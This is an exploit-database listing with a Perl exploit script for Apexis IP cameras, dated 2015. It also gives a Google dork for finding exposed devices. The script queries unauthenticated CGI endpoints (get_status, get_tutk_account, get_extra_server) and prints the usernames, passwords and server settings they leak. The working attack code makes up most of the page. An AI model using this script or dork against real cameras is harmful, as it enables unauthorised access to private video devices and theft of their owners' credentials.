Apexis IP CAM Username / Password Disclosure



EKU-ID: 4900 CVE: OSVDB-ID:
Author: Daniel Godoy Published: 2015-06-10 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


http://pastebin.com/AJ9eQvXc


# Exploit Title: Apexis IP CAM - Full Info Disclosure
# Google Dork: inurl:"get_status.cgi"cgi-bin/
# Date: 01/06/2015
# Exploit Author: Sunplace Solutions - Soluciones Informáticas - #RE
Remoteexecution.net
# Vendor Homepage: http://www.apexis.com.cn/
# Tested on: Linux

[Exploit Code]

#!/usr/bin/perl
print "[ Apexis IP CAM - Full Info Disclosure ]\n";
print "[ Discovery by: Sunplace Solutions ]\n";
print "[ Exploit:  Sunplace Solutions ]\n";
print "[ Greetz: www.remoteexecution.net - Daniel Godoy ]\n";
print "URL: ";
$url=<STDIN>;
use LWP::UserAgent;
my $ua = LWP::UserAgent->new;

$ua->agent('Mozilla/35.0 (compatible; MSIE 5.0; Windows 7)');

chop($url);
if ($url eq "")
  {
    print 'URL dont empty!.'."\n";
  }
  else
  {
   $www = new LWP::UserAgent;
   @path=split(/cgi-bin/,$url);
   $content = $www->get($url) or error();
    print "\n[x]Trying to pwn =>".$path[1]."\n";
    print "Result: \n";

   $pwn = $content->content;
   $pwn=~ s/var//g;
   $pwn=~ s/ //g;
   $pwn=~ s/ret_//g;
   print $pwn;

    print "\n[x]Trying to pwn => /get_tutk_account\n";
    print "Result: \n";
   $content = $www->get($path[0]."cgi-bin/get_tutk_account.cgi") or error();
   $pwn = $content->content;
   $pwn=~ s/var//g;
   $pwn=~ s/ret_//g;
   $pwn=~ s/ //g;

   print $pwn;

    print "\n[x]Trying to pwn => /get_extra_server.cgi\n";
    print "Result: \n";
   $content = $www->get($path[0]."cgi-bin/get_extra_server.cgi") or error();
   $pwn = $content->content;
   $pwn=~ s/var//g;
   $pwn=~ s/ret_//g;
   $pwn=~ s/extra_//g;
   $pwn=~ s/ //g;
   print $pwn;
  }